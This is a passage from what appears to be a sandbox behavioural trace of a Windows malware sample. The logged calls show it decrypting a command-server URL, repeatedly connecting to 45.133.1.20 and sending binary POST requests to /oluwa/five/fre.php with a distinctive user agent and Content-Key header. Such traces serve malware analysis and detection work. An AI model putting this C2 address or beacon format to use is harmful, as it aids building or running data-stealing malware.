hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0227.627] GetProcessHeap () returned 0x6a0000 [0227.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0227.628] GetProcessHeap () returned 0x6a0000 [0227.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0227.628] GetProcessHeap () returned 0x6a0000 [0227.628] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0227.629] closesocket (s=0x6cc) returned 0 [0227.629] GetProcessHeap () returned 0x6a0000 [0227.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0227.629] GetProcessHeap () returned 0x6a0000 [0227.629] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0227.630] GetProcessHeap () returned 0x6a0000 [0227.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0227.630] GetProcessHeap () returned 0x6a0000 [0227.630] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0227.631] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb44) returned 0x6cc [0227.634] Sleep (dwMilliseconds=0xea60) [0227.635] GetProcessHeap () returned 0x6a0000 [0227.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0227.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.637] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.644] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0227.654] GetProcessHeap () returned 0x6a0000 [0227.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0227.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.661] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0227.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.662] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.663] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.663] GetProcessHeap () returned 0x6a0000 [0227.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0227.664] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.665] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0227.666] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.666] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0227.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.667] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0227.667] GetProcessHeap () returned 0x6a0000 [0227.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0227.668] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.669] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0227.673] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.674] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0227.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.675] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0227.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.676] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0227.676] GetProcessHeap () returned 0x6a0000 [0227.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0227.676] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0227.677] GetProcessHeap () returned 0x6a0000 [0227.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0227.677] GetProcessHeap () returned 0x6a0000 [0227.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0227.678] GetProcessHeap () returned 0x6a0000 [0227.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0227.678] GetProcessHeap () returned 0x6a0000 [0227.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0227.681] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.682] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.688] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.688] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0227.698] GetProcessHeap () returned 0x6a0000 [0227.698] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0227.699] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.699] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0227.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.700] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.704] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.704] GetProcessHeap () returned 0x6a0000 [0227.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0227.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.706] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0227.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.707] CryptDestroyKey (hKey=0x6ad060) returned 1 [0227.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.709] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0227.709] GetProcessHeap () returned 0x6a0000 [0227.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0227.710] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.710] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0227.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.712] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0227.713] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.713] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0227.714] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.715] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0227.715] GetProcessHeap () returned 0x6a0000 [0227.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0227.715] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0227.715] GetProcessHeap () returned 0x6a0000 [0227.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9b0 [0227.715] socket (af=2, type=1, protocol=6) returned 0x6d0 [0227.716] connect (s=0x6d0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0227.751] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0227.751] GetProcessHeap () returned 0x6a0000 [0227.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0227.752] GetProcessHeap () returned 0x6a0000 [0227.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0227.752] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0227.753] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0227.754] GetProcessHeap () returned 0x6a0000 [0227.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0227.754] GetProcessHeap () returned 0x6a0000 [0227.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0227.754] GetProcessHeap () returned 0x6a0000 [0227.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0227.754] GetProcessHeap () returned 0x6a0000 [0227.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0227.755] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0227.756] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0227.756] GetProcessHeap () returned 0x6a0000 [0227.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0227.756] GetProcessHeap () returned 0x6a0000 [0227.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0227.757] send (s=0x6d0, buf=0x6b5c98*, len=242, flags=0) returned 242 [0227.757] send (s=0x6d0, buf=0x6bb998*, len=159, flags=0) returned 159 [0227.757] GetProcessHeap () returned 0x6a0000 [0227.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0227.757] recv (in: s=0x6d0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0227.830] GetProcessHeap () returned 0x6a0000 [0227.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0227.831] GetProcessHeap () returned 0x6a0000 [0227.831] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0227.831] GetProcessHeap () returned 0x6a0000 [0227.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0227.832] GetProcessHeap () returned 0x6a0000 [0227.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0227.834] closesocket (s=0x6d0) returned 0 [0227.834] GetProcessHeap () returned 0x6a0000 [0227.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9b0 | out: hHeap=0x6a0000) returned 1 [0227.834] GetProcessHeap () returned 0x6a0000 [0227.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0227.834] GetProcessHeap () returned 0x6a0000 [0227.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0227.835] GetProcessHeap () returned 0x6a0000 [0227.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0227.835] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x13e4) returned 0x6d0 [0227.836] Sleep (dwMilliseconds=0xea60) [0227.838] GetProcessHeap () returned 0x6a0000 [0227.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0227.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.839] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.847] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0227.854] GetProcessHeap () returned 0x6a0000 [0227.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8950 [0227.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.858] CryptImportKey (in: hProv=0x6bef48, pbData=0x6d8950, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0227.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.859] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.861] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.861] GetProcessHeap () returned 0x6a0000 [0227.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8950 | out: hHeap=0x6a0000) returned 1 [0227.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.864] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0227.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.868] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0227.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.869] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0227.869] GetProcessHeap () returned 0x6a0000 [0227.869] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0227.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.870] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0227.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.871] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0227.872] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.872] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0227.873] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.873] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0227.873] GetProcessHeap () returned 0x6a0000 [0227.873] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0227.873] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0227.876] GetProcessHeap () returned 0x6a0000 [0227.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0227.877] GetProcessHeap () returned 0x6a0000 [0227.877] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0227.877] GetProcessHeap () returned 0x6a0000 [0227.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0227.878] GetProcessHeap () returned 0x6a0000 [0227.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0227.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.879] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0227.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.885] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0227.903] GetProcessHeap () returned 0x6a0000 [0227.903] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0227.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.904] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0227.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.905] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0227.906] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.906] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0227.906] GetProcessHeap () returned 0x6a0000 [0227.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0227.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.908] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0227.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.912] CryptDestroyKey (hKey=0x6ad020) returned 1 [0227.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0227.914] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0227.914] GetProcessHeap () returned 0x6a0000 [0227.914] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0227.915] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.915] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0227.916] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.916] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0227.917] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.917] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0227.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0227.919] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0227.919] GetProcessHeap () returned 0x6a0000 [0227.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0227.919] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0227.919] GetProcessHeap () returned 0x6a0000 [0227.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baad0 [0227.919] socket (af=2, type=1, protocol=6) returned 0x6d4 [0227.919] connect (s=0x6d4, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0227.944] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0227.944] GetProcessHeap () returned 0x6a0000 [0227.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0227.944] GetProcessHeap () returned 0x6a0000 [0227.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6daf28 [0227.945] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0227.946] wvsprintfA (in: param_1=0x6daf28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0227.946] GetProcessHeap () returned 0x6a0000 [0227.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6d93c0 [0227.946] GetProcessHeap () returned 0x6a0000 [0227.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0227.946] GetProcessHeap () returned 0x6a0000 [0227.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0227.947] GetProcessHeap () returned 0x6a0000 [0227.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6daf28 [0227.947] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0227.950] wvsprintfA (in: param_1=0x6daf28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0227.950] GetProcessHeap () returned 0x6a0000 [0227.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0227.950] GetProcessHeap () returned 0x6a0000 [0227.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6daf28 | out: hHeap=0x6a0000) returned 1 [0227.951] send (s=0x6d4, buf=0x6bd460*, len=242, flags=0) returned 242 [0227.952] send (s=0x6d4, buf=0x6bb998*, len=159, flags=0) returned 159 [0227.952] GetProcessHeap () returned 0x6a0000 [0227.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0227.952] recv (in: s=0x6d4, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0228.032] GetProcessHeap () returned 0x6a0000 [0228.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0228.033] GetProcessHeap () returned 0x6a0000 [0228.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0228.033] GetProcessHeap () returned 0x6a0000 [0228.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d93c0 | out: hHeap=0x6a0000) returned 1 [0228.034] GetProcessHeap () returned 0x6a0000 [0228.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0228.034] closesocket (s=0x6d4) returned 0 [0228.035] GetProcessHeap () returned 0x6a0000 [0228.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baad0 | out: hHeap=0x6a0000) returned 1 [0228.035] GetProcessHeap () returned 0x6a0000 [0228.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 